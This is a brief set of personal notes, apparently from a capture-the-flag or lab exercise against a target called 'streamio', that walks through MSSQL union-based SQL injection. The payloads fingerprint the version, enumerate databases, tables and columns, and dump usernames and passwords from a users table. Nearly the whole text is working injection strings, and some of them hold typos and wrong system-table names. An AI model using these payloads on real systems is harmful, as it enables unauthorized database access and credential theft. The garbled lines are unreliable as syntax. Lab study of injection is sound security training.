speculating echo bit location
1' union select 1,2,3,4,5,6;-- -
echo bit at 2 and 3
mssql version detecting
1' union select 1,@@version,3,4,5,6;-- -
confirming the current database
1' union select 1,db_name(),3,4,5,6;-- - ##error
--
except system variable,we have to use select to bring out data from master..systemdatabases
1' union select 1,(select db_name()),3,4,5,6 from master..systemdatabases;-- - ##true
exploring the table from streamio(db_name())
1' union select 1,name,id,4,5,6 from master..systemdatabases where xtype='U';-- -
--
tips:because this table was created by user,the storage type 'xtype' is 'U' and we must specify xtype
at the time we query for table
exploring the columns from name and id
1'union selct 1,col_name(object_id('users'),2,3,4,5,6 from systemobject;-- - X #error
--
a.we have to specify database's systemobjects that inquire data
b.we have to remember when want to inquire columns using col_name(object_id('xx')) and id to query
--
1' union select 1,col_name(object_id('users')),2,3,4,5,6 from streamio..systemobjects
where id in (885578193,9051578250);-- -
extracting the data stored in columns
1' union select 1,concat(username,0x7e,password),3,4,5,6 from users;-- -
1' union select 1,concat(username,':',password),3,4,5,6 from users;-- -
steps over